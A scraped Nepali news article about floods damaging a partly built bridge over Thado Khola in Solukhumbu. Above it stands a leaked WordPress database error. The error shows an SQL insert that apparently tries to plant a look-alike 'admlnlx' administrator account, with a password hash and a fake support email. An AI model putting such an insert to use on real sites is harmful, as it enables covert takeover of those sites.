WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BfIf/hp1gVmFZQfBlNJYfwnfbgoISw/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 15:26:26', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, ७ साउन, सोलुखुम्बु । सोलुखुम्बुको नेचासल्यान गाउँपालिकाको ठाडो खोलामा निर्माणाधीन पक्की पुलमा बाढीले क्षति पुर्यएको छ । पुल निर्माण कार्य भइरहेको खोलामा आएको बाढीले १० लाख भन्दा बढीको क्षति गरेको निर्माण कम्पनीका साइट इन्चार्ज रिन्जी शेर्पाले बताए ।
लगभग चार करोड रुपियाँको लागतमा निर्माण सम्पन्न गर्ने जिम्मा लिएको ए.डी. विल्डर्स काठ्माण्डौँले लिएको हो । उक्त्त पुलमा ढलान हाल्न पूर्ण तयारीमा रहेको बेला बाढीले फाउण्डेसन सबै बगाउँदा फेरी सबै भत्काएर बनाउनु पर्ने इन्चार्ज शेर्पाको जानकारी दिए ।
तिङ्ला रमिते–सल्यान–केराबारी–नेचा बिहीबारे नाम दिइएको उक्त सडकमा पर्ने सल्यानको ठाडो खोलाको पुल नहुँदा वर्षायाममा आवतजावत ठप्प जस्तै हुने गरेको छ । सडकको स्तरोन्नतीसँगै सल्यानको ठाडो खोलामा पुल बनेपछि सबै सिजनमा यातायात सञ्चालन हुनेमा ढुक्क भएका स्थानीय खोलाले पुलमा नोक्सान गर्दा अझै लामो समय लाग्ने भन्दै चिन्तित बनेकाछन् ।
साभार: हिमशिखर